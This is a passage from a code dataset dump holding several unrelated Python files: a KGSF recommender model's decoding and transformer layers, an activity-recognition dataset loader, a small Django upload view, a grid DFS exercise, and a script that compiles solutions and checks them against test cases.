sum_logits, preds\n\n def _decode_greedy_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask):\n batch_size = token_encoding[0].shape[0]\n inputs = self._starts(batch_size).long()\n incr_state = None\n logits = []\n for _ in range(self.response_truncate):\n dialog_latent, incr_state = self.conv_decoder(inputs, token_encoding, word_reps, word_mask,\n entity_reps, entity_mask, incr_state)\n dialog_latent = dialog_latent[:, -1:, :] # (bs, 1, dim)\n db_latent = entity_emb_attn.unsqueeze(1)\n concept_latent = word_emb_attn.unsqueeze(1)\n copy_latent = self.copy_norm(torch.cat((db_latent, concept_latent, dialog_latent), dim=-1))\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(0)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight)\n sum_logits = copy_logits + gen_logits\n preds = sum_logits.argmax(dim=-1).long()\n logits.append(sum_logits)\n inputs = torch.cat((inputs, preds), dim=1)\n\n finished = ((inputs == self.end_token_idx).sum(dim=-1) > 0).sum().item() == batch_size\n if finished:\n break\n logits = torch.cat(logits, dim=1)\n return logits, inputs\n\n def _decode_beam_search_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask, beam=4):\n batch_size = token_encoding[0].shape[0]\n inputs = self._starts(batch_size).long().reshape(1, batch_size, -1)\n incr_state = None\n\n sequences = [[[list(), list(), 1.0]]] * batch_size\n for i in range(self.response_truncate):\n if i == 1:\n token_encoding = (token_encoding[0].repeat(beam, 1, 1),\n token_encoding[1].repeat(beam, 1, 1))\n entity_reps = entity_reps.repeat(beam, 1, 1)\n entity_emb_attn = entity_emb_attn.repeat(beam, 1)\n entity_mask = entity_mask.repeat(beam, 1)\n word_reps = word_reps.repeat(beam, 1, 1)\n word_emb_attn = word_emb_attn.repeat(beam, 1)\n word_mask = word_mask.repeat(beam, 1)\n\n # at beginning there is 1 candidate, when i!=0 there are 4 candidates\n if i != 0:\n inputs = []\n for d in range(len(sequences[0])):\n for j in range(batch_size):\n text = sequences[j][d][0]\n inputs.append(text)\n inputs = torch.stack(inputs).reshape(beam, batch_size, -1) # (beam, batch_size, _)\n\n with torch.no_grad():\n dialog_latent, incr_state = self.conv_decoder(\n inputs.reshape(len(sequences[0]) * batch_size, -1),\n token_encoding, word_reps, word_mask,\n entity_reps, entity_mask, incr_state\n )\n dialog_latent = dialog_latent[:, -1:, :] # (bs, 1, dim)\n db_latent = entity_emb_attn.unsqueeze(1)\n concept_latent = word_emb_attn.unsqueeze(1)\n copy_latent = self.copy_norm(torch.cat((db_latent, concept_latent, dialog_latent), dim=-1))\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(0)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight)\n sum_logits = copy_logits + gen_logits\n\n logits = sum_logits.reshape(len(sequences[0]), batch_size, 1, -1)\n # turn into probabilities,in case of negative numbers\n probs, preds = torch.nn.functional.softmax(logits).topk(beam, dim=-1)\n\n # (candeidate, bs, 1 , beam) during first loop, candidate=1, otherwise candidate=beam\n\n for j in range(batch_size):\n all_candidates = []\n for n in range(len(sequences[j])):\n for k in range(beam):\n prob = sequences[j][n][2]\n logit = sequences[j][n][1]\n if logit == []:\n logit_tmp = logits[n][j][0].unsqueeze(0)\n else:\n logit_tmp = torch.cat((logit, logits[n][j][0].unsqueeze(0)), dim=0)\n seq_tmp = torch.cat((inputs[n][j].reshape(-1), preds[n][j][0][k].reshape(-1)))\n candidate = [seq_tmp, logit_tmp, prob * probs[n][j][0][k]]\n all_candidates.append(candidate)\n ordered = sorted(all_candidates, key=lambda tup: tup[2], reverse=True)\n sequences[j] = ordered[:beam]\n\n # check if everyone has generated an end token\n all_finished = ((inputs == self.end_token_idx).sum(dim=1) > 0).sum().item() == batch_size\n if all_finished:\n break\n logits = torch.stack([seq[0][1] for seq in sequences])\n inputs = torch.stack([seq[0][0] for seq in sequences])\n return logits, inputs\n\n def converse(self, batch, mode):\n context_tokens, context_entities, context_words, response = batch\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n entity_padding_mask = context_entities.eq(self.pad_entity_idx) # (bs, entity_len)\n word_padding_mask = context_words.eq(self.pad_word_idx) # (bs, seq_len)\n\n entity_representations = entity_graph_representations[context_entities]\n word_representations = word_graph_representations[context_words]\n\n entity_attn_rep = self.entity_self_attn(entity_representations, entity_padding_mask)\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n\n # encoder-decoder\n tokens_encoding = self.conv_encoder(context_tokens)\n conv_entity_emb = self.conv_entity_attn_norm(entity_attn_rep)\n conv_word_emb = self.conv_word_attn_norm(word_attn_rep)\n conv_entity_reps = self.conv_entity_norm(entity_representations)\n conv_word_reps = self.conv_word_norm(word_representations)\n if mode != 'test':\n logits, preds = self._decode_forced_with_kg(tokens_encoding, conv_entity_reps, conv_entity_emb,\n entity_padding_mask,\n conv_word_reps, conv_word_emb, word_padding_mask,\n response)\n\n logits = logits.view(-1, logits.shape[-1])\n response = response.view(-1)\n loss = self.conv_loss(logits, response)\n return loss, preds\n else:\n logits, preds = self._decode_greedy_with_kg(tokens_encoding, conv_entity_reps, conv_entity_emb,\n entity_padding_mask,\n conv_word_reps, conv_word_emb, word_padding_mask)\n return preds\n\n def forward(self, batch, stage, mode):\n if len(self.gpu) >= 2:\n # forward function operates on different gpus, the weight of graph network need to be copied to other gpu\n self.entity_edge_idx = self.entity_edge_idx.cuda(torch.cuda.current_device())\n self.entity_edge_type = self.entity_edge_type.cuda(torch.cuda.current_device())\n self.word_edges = self.word_edges.cuda(torch.cuda.current_device())\n self.copy_mask = torch.as_tensor(np.load(os.path.join(self.dpath, \"copy_mask.npy\")).astype(bool),\n ).cuda(torch.cuda.current_device())\n if stage == \"pretrain\":\n loss = self.pretrain_infomax(batch)\n elif stage == \"rec\":\n loss = self.recommend(batch, mode)\n elif stage == \"conv\":\n loss = self.converse(batch, mode)\n return loss\n\n\nclass GateLayer(nn.Module):\n def __init__(self, input_dim):\n super(GateLayer, self).__init__()\n self._norm_layer1 = nn.Linear(input_dim * 2, input_dim)\n self._norm_layer2 = nn.Linear(input_dim, 1)\n\n def forward(self, input1, input2):\n norm_input = self._norm_layer1(torch.cat([input1, input2], dim=-1))\n gate = torch.sigmoid(self._norm_layer2(norm_input)) # (bs, 1)\n gated_emb = gate * input1 + (1 - gate) * input2 # (bs, dim)\n return gated_emb\n\n\nclass TransformerDecoderLayerKG(nn.Module):\n def __init__(\n self,\n n_heads,\n embedding_size,\n ffn_size,\n attention_dropout=0.0,\n relu_dropout=0.0,\n dropout=0.0,\n ):\n super().__init__()\n self.dim = embedding_size\n self.ffn_dim = ffn_size\n self.dropout = nn.Dropout(p=dropout)\n\n self.self_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm1 = nn.LayerNorm(embedding_size)\n\n self.encoder_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2 = nn.LayerNorm(embedding_size)\n\n self.encoder_db_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2_db = nn.LayerNorm(embedding_size)\n\n self.encoder_kg_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2_kg = nn.LayerNorm(embedding_size)\n\n self.ffn = TransformerFFN(embedding_size, ffn_size, relu_dropout=relu_dropout)\n self.norm3 = nn.LayerNorm(embedding_size)\n\n def forward(self, x, encoder_output, encoder_mask, kg_encoder_output, kg_encoder_mask, db_encoder_output,\n db_encoder_mask):\n decoder_mask = _create_selfattn_mask(x)\n # first self attn\n residual = x\n # don't peak into the future!\n x = self.self_attention(query=x, mask=decoder_mask)\n x = self.dropout(x) # --dropout\n x = x + residual\n x = _normalize(x, self.norm1)\n\n residual = x\n x = self.encoder_db_attention(\n query=x,\n key=db_encoder_output,\n value=db_encoder_output,\n mask=db_encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2_db)\n\n residual = x\n x = self.encoder_kg_attention(\n query=x,\n key=kg_encoder_output,\n value=kg_encoder_output,\n mask=kg_encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2_kg)\n\n residual = x\n x = self.encoder_attention(\n query=x,\n key=encoder_output,\n value=encoder_output,\n mask=encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2)\n\n # finally the ffn\n residual = x\n x = self.ffn(x)\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm3)\n\n return x\n\n\nclass TransformerDecoderKG(nn.Module):\n \"\"\"\n Transformer Decoder layer.\n\n :param int n_heads: the number of multihead attention heads.\n :param int n_layers: number of transformer layers.\n :param int embedding_size: the embedding sizes. Must be a multiple of n_heads.\n :param int ffn_size: the size of the hidden layer in the FFN\n :param embedding: an embedding matrix for the bottom layer of the transformer.\n If none, one is created for this encoder.\n :param float dropout: Dropout used around embeddings and before layer\n layer normalizations. This is used in Vaswani 2017 and works well on\n large datasets.\n :param float attention_dropout: Dropout performed after the multhead attention\n softmax. This is not used in Vaswani 2017.\n :param float relu_dropout: Dropout used after the ReLU in the FFN. Not used\n in Vaswani 2017, but used in Tensor2Tensor.\n :param int padding_idx: Reserved padding index in the embeddings matrix.\n :param bool learn_positional_embeddings: If off, sinusoidal embeddings are\n used. If on, position embeddings are learned from scratch.\n :param bool embeddings_scale: Scale embeddings relative to their dimensionality.\n Found useful in fairseq.\n :param int n_positions: Size of the position embeddings matrix.\n \"\"\"\n\n def __init__(\n self,\n n_heads,\n n_layers,\n embedding_size,\n ffn_size,\n vocabulary_size,\n embedding,\n dropout=0.0,\n attention_dropout=0.0,\n relu_dropout=0.0,\n embeddings_scale=True,\n learn_positional_embeddings=False,\n padding_idx=None,\n n_positions=1024,\n ):\n super().__init__()\n self.embedding_size = embedding_size\n self.ffn_size = ffn_size\n self.n_layers = n_layers\n self.n_heads = n_heads\n self.dim = embedding_size\n self.embeddings_scale = embeddings_scale\n self.dropout = nn.Dropout(dropout) # --dropout\n\n self.out_dim = embedding_size\n assert embedding_size % n_heads == 0, \\\n 'Transformer embedding size must be a multiple of n_heads'\n\n self.embeddings = embedding\n\n # create the positional embeddings\n self.position_embeddings = nn.Embedding(n_positions, embedding_size)\n if not learn_positional_embeddings:\n create_position_codes(\n n_positions, embedding_size, out=self.position_embeddings.weight\n )\n else:\n nn.init.normal_(self.position_embeddings.weight, 0, embedding_size ** -0.5)\n\n # build the model\n self.layers = nn.ModuleList()\n for _ in range(self.n_layers):\n self.layers.append(TransformerDecoderLayerKG(\n n_heads, embedding_size, ffn_size,\n attention_dropout=attention_dropout,\n relu_dropout=relu_dropout,\n dropout=dropout,\n ))\n\n def forward(self, input, encoder_state, kg_encoder_output, kg_encoder_mask,\n db_encoder_output, db_encoder_mask, incr_state=None):\n encoder_output, encoder_mask = encoder_state\n\n seq_len = input.size(1)\n positions = input.new(seq_len).long() # (seq_len)\n positions = torch.arange(seq_len, out=positions).unsqueeze(0) # (1, seq_len)\n tensor = self.embeddings(input) # (bs, seq_len, embed_dim)\n if self.embeddings_scale:\n tensor = tensor * np.sqrt(self.dim)\n tensor = tensor + self.position_embeddings(positions).expand_as(tensor)\n tensor = self.dropout(tensor) # --dropout\n\n for layer in self.layers:\n tensor = layer(tensor, encoder_output, encoder_mask, kg_encoder_output, kg_encoder_mask, db_encoder_output,\n db_encoder_mask)\n\n return tensor, None\n","sub_path":"crslab/model/generation/kgsf.py","file_name":"kgsf.py","file_ext":"py","file_size_in_byte":31621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2558047","text":"import os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom .base import dataset, real_dataset, classification_dataset\nfrom ..util.util import remove_gravity_data\n\ndef load_shar(basedir=\"UniMiB-SHAR/\", version=\"adl\", folds=10, random_split=False, **kwargs):\n full_data = loadmat(os.path.join(basedir, \"data\", \"%s_data.mat\" % version))[\n \"%s_data\" % version\n ]\n labids = loadmat(os.path.join(basedir, \"data\", \"%s_labels.mat\" % version))[\n \"%s_labels\" % version\n ]\n labs, ids = labids[:, 0], labids[:, 1]\n names = loadmat(os.path.join(basedir, \"data\", \"%s_names.mat\" % version))[\n \"%s_names\" % version\n ]\n\n data, labels, meta = [], [], []\n names = [str(n[0]) for n in names[:, 0]]\n for di, li, si in zip(full_data, labs, ids):\n labels.append(li - 1)\n data.append(np.stack([di[:151], di[151:302], di[302:]]).T)\n si = int(np.random.random() * folds) if random_split else si\n meta.append({\"subject\": si - 1, \"cv\": (si - 1) % folds, \"labels\": names})\n return data, labels, meta\n\n\ndef get_cv_split(data, split=0, gensplits=0, seed=543, cv_semisup=0, key=\"cv\", cv_valid=0, **kwargs):\n xtrain, ytrain, ztrain = [], [], []\n xvalid, yvalid, zvalid = [], [], []\n xtest, ytest, ztest = [], [], []\n x, y, z = data\n nsplits = max([int(zi[key]) for zi in z if key in zi]) + 1\n\n if gensplits:\n order = np.array([i % gensplits for i in range(len(x))], dtype=int)\n semisup_prng = np.random.RandomState(seed)\n semisup_prng.shuffle(order)\n z = [dict(cv=i) for i in order]\n\n for xi, yi, zi in zip(x, y, z):\n try:\n in_split = key in zi and (zi[key] == split or zi[key] in split)\n except:\n in_split = False\n\n if in_split:\n xtest.append(xi)\n ytest.append(yi)\n ztest.append(zi)\n elif key in zi and cv_valid > 0 and zi[key] in [((split + cvi) % nsplits) for cvi in\n range(abs(cv_semisup) + 1, abs(cv_semisup) + 1 + cv_valid)]:\n xvalid.append(xi)\n yvalid.append(yi)\n zvalid.append(zi)\n elif key in zi:\n yi = yi * 0 - 1 if \"mask\" in zi and zi[\"mask\"] else yi\n if cv_semisup > 0:\n yi = (\n yi\n if key in zi and zi[key] in [((split + cvi) % nsplits) for cvi in range(1, cv_semisup + 1)]\n else yi * 0 - 1\n )\n if cv_semisup < 0:\n zi['remove'] = not (key in zi and zi[key] in [((split + cvi) % nsplits) for cvi in\n range(1, abs(cv_semisup) + 1)])\n if \"remove\" not in zi or not zi[\"remove\"]:\n xtrain.append(xi)\n ytrain.append(yi)\n ztrain.append(zi)\n if cv_valid > 0:\n return (xtrain, ytrain, ztrain), (xvalid, yvalid, zvalid), (xtest, ytest, ztest)\n return (xtrain, ytrain, ztrain), (xtest, ytest, ztest), (xtest, ytest, ztest)\n\n\nclass shar(dataset, real_dataset, classification_dataset):\n def __init__(self, version='adl', cv_semisup=0, split=0, folds=10, basedir='UniMiB-SHAR/', xyz_channels=True, oned_stacks=0, remove_grav=True,\n **kwargs):\n dataset.__init__(self, **kwargs)\n self._name = 'SHAR_ALL'\n self._noutputs = 9 if version == 'adl' else 17\n self._labels = ['standing', 'getting up', 'walking', 'running', 'up stairs', 'jumping', 'down stairs', 'lying',\n 'sitting']\n self._args = kwargs\n self._cv_semisup = cv_semisup\n self._split = split\n self._folds = folds\n self._version = version\n self._basedir = basedir\n self.semisupervised = cv_semisup > 0\n self.rescale_images = False\n self.imagedata = False\n self.xyz_channels = xyz_channels\n self.remove_grav = remove_grav\n self.shar_standardize = False\n self.shar_instance_standardize = True\n self.oned_stacks = oned_stacks\n\n def fetch_data(self, download_dir=None):\n train, valid, testd = get_cv_split(\n load_shar(basedir=self._basedir, version=self._version, folds=self._folds, **self._args),\n cv_semisup=self._cv_semisup, split=self._split, **self._args)\n if self.remove_grav:\n train, valid, testd = remove_gravity_data(train), remove_gravity_data(valid), remove_gravity_data(testd)\n if self.shar_standardize:\n x = np.stack(train[0])\n mean = np.mean(x, axis=(0, 1), keepdims=True)[0]\n std = np.std(x, axis=(0, 1), keepdims=True)[0]\n train = ([np.tanh((t - mean) / (2 * std)) for t in train[0]],) + train[1:]\n valid = ([np.tanh((t - mean) / (2 * std)) for t in valid[0]],) + valid[1:]\n testd = ([np.tanh((t - mean) / (2 * std)) for t in testd[0]],) + testd[1:]\n if self.shar_instance_standardize:\n train = ([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in train[0]],) + train[1:]\n valid = ([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in valid[0]],) + valid[1:]\n testd = ([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in testd[0]],) + testd[1:]\n if self.xyz_channels:\n shape = (-1, 1, 151, 3)\n train = np.stack(train[0]).reshape(shape)[:, :, 3:147], np.array(train[1])\n valid = np.stack(valid[0]).reshape(shape)[:, :, 3:147], np.array(valid[1])\n test = np.stack(testd[0]).reshape(shape)[:, :, 3:147], np.array(testd[1])\n\n if self.oned_stacks:\n train = (np.repeat(train[0], self.oned_stacks, axis=1), train[1])\n valid = (np.repeat(valid[0], self.oned_stacks, axis=1), valid[1])\n test = (np.repeat(test[0], self.oned_stacks, axis=1), test[1])\n else:\n shape = (-1, 151, 3, 1)\n train = np.stack(train[0]).reshape(shape)[:, 3:147], np.array(train[1])\n valid = np.stack(valid[0]).reshape(shape)[:, 3:147], np.array(valid[1])\n test = np.stack(testd[0]).reshape(shape)[:, 3:147], np.array(testd[1])\n\n self.data = dict(train=(train[0], train[1]),\n valid=(valid[0], valid[1]), test=(test[0], test[1]))\n\nclass shar_std(shar):\n def __init__(self, **kwargs):\n shar.__init__(self, **kwargs)\n self.shar_standardize = True\n\nclass shar_istd(shar):\n def __init__(self, **kwargs):\n shar.__init__(self, **kwargs)\n self.shar_instance_standardize = True\n","sub_path":"src/PC-HMM/tutorial_files/pcvae/datasets/shar.py","file_name":"shar.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99362021","text":"__author__ = 'nsaraiva'\n\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\n\ndef uploading(request):\n if request.method == 'POST':\n file = request.POST('request.FILES')\n return render_to_response('C:/python25/djangoProjects/iris/forms/ok.html',{'file':file,})\n else:\n return render_to_response('C:/python25/djangoProjects/iris/forms/upload.html')\n ","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262859980","text":"\ndef dfs(x,y):\n if x <= -1 or x >= n or y <= -1 or y >= m:\n return False\n if G[x][y] == 0:\n G[x][y] = 1\n\n dfs(x,y+1)\n dfs(x+1,y)\n dfs(x,y-1)\n dfs(x-1,y)\n\n return True\n return False\n\n# G 만들기\nn, m = map(int, input().split())\nG = []\nfor i in range(n):\n G.append(list(map(int, input())))\n'''\n4 5\n00110\n00011\n11111\n00000\n'''\nprint(G)\n#\n# [\n# [0, 0, 1, 1, 0],\n# [0, 0, 0, 1, 1],\n# [1, 1, 1, 1, 1],\n# [0, 0, 0, 0, 0]\n# ]\n\nresult = 0\nfor i in range(n):\n for j in range(m):\n if dfs(i,j) == True:\n result += 1\nprint(result)","sub_path":"python-for-coding-test/음료수 얼려 먹기.py","file_name":"음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271077768","text":"import pickle\nimport sys\nimport os\nimport re\n\nusage = (\n'''Usage:\n python3 test_task.py task_letter file_name\nOptions:\n --no-timeout: solution won't be terminated if it runs longer than 2 * (time limit).\n --add_task: add a custom task (not required, but will allow setting for example custom time limit)\nThe config file is located in ~/.cf_helper_config - it determines commands used to compile and run solutions.'''\n)\n\ndefault_config_file = (\n'''# This file will be used by test_task to compile and test solutions.\n# Each line (except for comment lines which start with '#') should have a following format:\n# .extension,.extension2|compile command|run command\n# Compile command can be left empty if you use for example Python.\n# The name of the file passed as the argument to test_task will be put after the compile command or, if compile command is empty, after the run command.\n\n.cpp,.cc|g++ -std=c++11 -O2 -Wall|./a.out\n.py||python3'''\n)\n\nconfig_path = os.path.expanduser('~/.cf_helper_config')\nif not os.path.isfile(config_path):\n with open(config_path, 'w') as f:\n f.write(default_config_file)\n\nmem_div = None\nconfig = {}\nwith open(config_path, 'r') as f:\n for line in f:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('mem_div'):\n mem_div = int(line.split('=')[1])\n else:\n split_line = line.split('|')\n if len(split_line) != 3:\n print(\"Incorrect config line (wrong amount of '|'): \", line)\n print('The config file is located in ' + config_path)\n sys.exit(1)\n extensions = split_line[0].split(',')\n for ext in extensions:\n if not ext.startswith('.'):\n print(\"Extension in config doesn't start with a '.': \", line)\n print('The config file is located in ' + config_path)\n sys.exit(1)\n config[ext.strip()] = (split_line[1].strip(), split_line[2].strip())\n\nadd_task_mode = False\ntask_shortname = ''\nprogram_name = ''\nuse_timeout = True\n\nif len(sys.argv) == 3:\n task_shortname = sys.argv[1].strip()\n program_name = sys.argv[2].strip()\nelif len(sys.argv) == 2:\n if '--add_task' in sys.argv:\n add_task_mode = True\n else:\n if '--no-timeout' in sys.argv:\n use_timeout = False\n program_name = sys.argv[1].strip()\n if '.' in program_name:\n task_shortname = program_name.rsplit('.', 1)[0]\n else:\n print(usage)\n sys.exit(1)\nelse:\n print(usage)\n sys.exit(1)\n\ncodeforces_data = True\n\ntasks = {}\ntry:\n with open('contest_info.pkl', 'rb') as f:\n tasks = pickle.load(f)\nexcept EnvironmentError as e:\n codeforces_data = False\n\nif add_task_mode:\n if not codeforces_data:\n tasks = {}\n task_shortname = input('Short task name: ').strip()\n tasks[task_shortname] = {}\n tasks[task_shortname]['name'] = input('Full task name: ').strip()\n tasks[task_shortname]['memory_limit'] = float(input('Memory limit (MB): '))\n tasks[task_shortname]['time_limit'] = float(input('Time limit (s): '))\n multiple_answers = input('Multiple answers possible for test cases? (Y/N): ')\n if multiple_answers.upper() == 'Y':\n tasks[task_shortname]['multiple_answers'] = True\n elif multiple_answers.upper() == 'N':\n tasks[task_shortname]['multiple_answers'] = False\n with open('contest_info.pkl', 'wb') as f:\n pickle.dump(tasks, f)\n sys.exit(0)\n\nif task_shortname.upper() in tasks:\n task_shortname = task_shortname.upper()\n\nif os.path.isfile(program_name):\n program_name = os.path.abspath(program_name)\n for ext in config:\n if program_name.endswith(ext):\n if config[ext][0]:\n print(ext + ' file, compiling: ' + config[ext][0] + ' ' + program_name)\n compile_ret = os.system(config[ext][0] + ' ' + program_name)\n if compile_ret == 0:\n print('Compilation successful.', end='\\n\\n')\n else:\n print('\\nCompilation not successful, exiting test_task.')\n sys.exit(1)\n program_name = config[ext][1]\n else:\n program_name = config[ext][1] + ' ' + program_name\n break\n# else: it's a command to execute\n\nCOLOR_RED = '\\033[91m'\nCOLOR_GREEN = '\\033[92m'\nCOLOR_BLUE = '\\033[94m'\nCOLOR_END = '\\033[0m'\n\nwa_text = COLOR_RED + 'WA' + COLOR_END\ncorrect_text = 'correct'\nok_text = COLOR_GREEN + 'OK' + COLOR_END\ntime_limit = None\n\nif codeforces_data and (task_shortname in tasks):\n print(tasks[task_shortname]['name'])\n if tasks[task_shortname]['multiple_answers']:\n print('In this task, multiple answers might be possible (probably). No WAs.')\n if tasks[task_shortname]['multiple_answers']:\n wa_text = COLOR_BLUE + '??' + COLOR_END\n correct_text = 'example'\n ok_text += ', user\\'s answer matches example answer'\n if tasks[task_shortname]['time_limit']:\n time_limit = tasks[task_shortname]['time_limit']\n print('Time limit: ' + format(time_limit, '.2f') + ' s')\n if tasks[task_shortname]['memory_limit']:\n print('Memory limit: ' + format(tasks[task_shortname]['memory_limit'], '.2f') + ' MB')\nelse:\n print(task_shortname + ' (no task data)')\n\nif time_limit == None:\n time_limit = 5\n print('Using default time limit: ' + format(time_limit, '.2f') + ' s')\nprint('')\n\ntime_regex = re.compile(r'^(\\d+\\.\\d+)\\s(\\d+)\\s(\\d+)$')\n\ndef time_command(command):\n timeout_command = ''\n if use_timeout:\n timeout_command = 'timeout ' + str(time_limit * 2.0)\n os.system(\"/usr/bin/time -f '%e %M %x' -o time.txt \" + timeout_command + ' ' + command)\n exec_time = ''\n exec_mem_used = ''\n exec_return_code = 0\n with open('time.txt', 'r') as f:\n for line in f:\n time_match = time_regex.search(line)\n if time_match != None:\n exec_time = time_match.group(1)\n exec_mem_used = int(time_match.group(2))/(1024*mem_div)\n exec_return_code = time_match.group(3)\n exec_error = ''\n if use_timeout and exec_return_code == '124':\n exec_error = 'Time limit exceeded, process killed after ' + format(time_limit * 2.0, '.2f') + ' s'\n elif exec_return_code != '0':\n exec_error = 'Process exited with exit status ' + exec_return_code\n return exec_time, exec_mem_used, exec_error\n\n# http://stackoverflow.com/questions/10035232/maximum-resident-set-size-does-not-make-sense\n# There is a bug in GNU time which makes it report 4 times too high memory usage\n# and it's fixed in some Linux distributions, but not in all of them.\n# The code below is a workaround to check if it happens with /usr/bin/time on this install.\n\nif mem_div is None:\n mem_div = 1\n mem_filename = 'mem_usage_test_sdilgf'\n with open(mem_filename + '.c', 'w') as f:\n f.write('int main() { return 0; }')\n os.system('gcc ' + mem_filename + '.c -o ' + mem_filename)\n if time_command('./' + mem_filename)[1] > 2.0:\n mem_div = 4\n os.remove(mem_filename + '.c')\n os.remove(mem_filename)\n with open(config_path, 'a') as f:\n f.write('\\n# Do not touch mem_div unless you know what you are doing.\\n')\n f.write('mem_div=' + str(mem_div) + '\\n')\n\ntests = []\nif os.path.isdir('./tests'):\n for f in os.listdir('./tests'):\n if f.startswith(task_shortname) and f.endswith('.in'):\n tests.append(f.lstrip(task_shortname).rstrip('.in'))\nelse:\n print('Directory ./tests not found.')\n sys.exit(0)\ntests = sorted(tests)\n\nif len(tests) == 0:\n print('No tests matching the filename: ./tests/' + task_shortname + '*.in found.')\n\nfor test in tests:\n test_name = task_shortname + test\n print(test_name + ': ', end='')\n exec_time, exec_mem_used, exec_error = time_command(program_name + ' < tests/' + test_name + '.in' + ' > tmp.out')\n if exec_error:\n print(COLOR_RED + exec_error + COLOR_END)\n continue\n exec_mem_used = format(exec_mem_used, '.2f')\n if float(exec_time) > time_limit:\n exec_time = COLOR_RED + exec_time + COLOR_END\n if task_shortname in tasks and 'memory_limit' in tasks[task_shortname] and float(exec_mem_used) > tasks[task_shortname]['memory_limit']:\n exec_mem_used = COLOR_RED + exec_mem_used + COLOR_END\n print(exec_time + ' s, ' + exec_mem_used + ' MB')\n spaces = ((len(test_name)+2)*' ')\n print(spaces, end='')\n if not os.path.isfile('tests/' + test_name + '.out'):\n print(COLOR_BLUE + '??' + COLOR_END + ', no output file to compare')\n continue\n correct_out, user_out = '', ''\n with open('tmp.out', 'r') as f:\n user_out = f.read().split('\\n')\n with open('tests/' + test_name + '.out', 'r') as f:\n correct_out = f.read().split('\\n')\n user_out = [ line.strip() for line in user_out if line.strip() != '' ]\n correct_out = [ line.strip() for line in correct_out if line.strip() != '' ]\n if len(user_out) != len(correct_out):\n print(wa_text + ', user output has ' + str(len(user_out)) + ' line(s), ' + correct_text + ' output has ' + str(len(correct_out)) + ' line(s)')\n else:\n ok = True\n for i in range(0, len(user_out)):\n if user_out[i] != correct_out[i]:\n print(wa_text + ', files different in line #' + str(i+1))\n print(spaces + 'user output: \\t' + user_out[i])\n print(spaces + correct_text + ' output:\\t' + correct_out[i])\n ok = False\n break\n if ok:\n print(ok_text)\n\nif os.path.isfile('tmp.out'):\n os.remove('tmp.out')\nif os.path.isfile('time.txt'):\n os.remove('time.txt')\n","sub_path":"test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99214978","text":"#!/usr/bin/python3\n\ndef addList(numList):\n\tnumList.append(10)\n\tsum = 0\n\tfor i in numList:\n\t\tsum += i\n\treturn sum\n\n\nnumlist = [1,2,3,4]\nprint (numlist)\n# Lists are passed by reference\nres = addList(numlist)\nprint (numlist)\nprint (res)\n\ndef addNum(x, y):\n\tx += y\n\treturn x\n\nx = 10\ny = 20\nprint(x, ' ', y)\nprint(addNum(x, y))\n# Basic types are passed by value\nprint(x, ' ', y)\n\ndef appendString(a, b):\n\ta += b\n\treturn a\n\na = \"Tej\"\nb = \"Babu\"\nprint(a,b)\nprint(appendString(a,b))\n# String is a basic datatype\nprint(a,b)\n\n","sub_path":"python/07-functions.py","file_name":"07-functions.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654473091","text":"import unittest\nfrom mock import patch\nfrom stepik.pattern_matching import find\n\nfrom io import StringIO\n\n\nclass TestStepikPatternProblem(unittest.TestCase):\n @patch('sys.stdin', StringIO('aba\\nabacaba'))\n def test_first(self):\n output_row = '0 4'\n self.assertEqual(find(), output_row)\n\n @patch('sys.stdin', StringIO('Test\\ntestTesttesT'))\n def test_second(self):\n output_row = '4'\n self.assertEqual(find(), output_row)\n\n @patch('sys.stdin', StringIO('aaaaa\\nbaaaaaaa'))\n def test_third(self):\n output_row = '1 2 3'\n self.assertEqual(find(), output_row)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"stepik/tests/pattern_matching_test.py","file_name":"pattern_matching_test.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314416456","text":"import rectangle\n\ndef getSquare(initialPos, endPos):\n 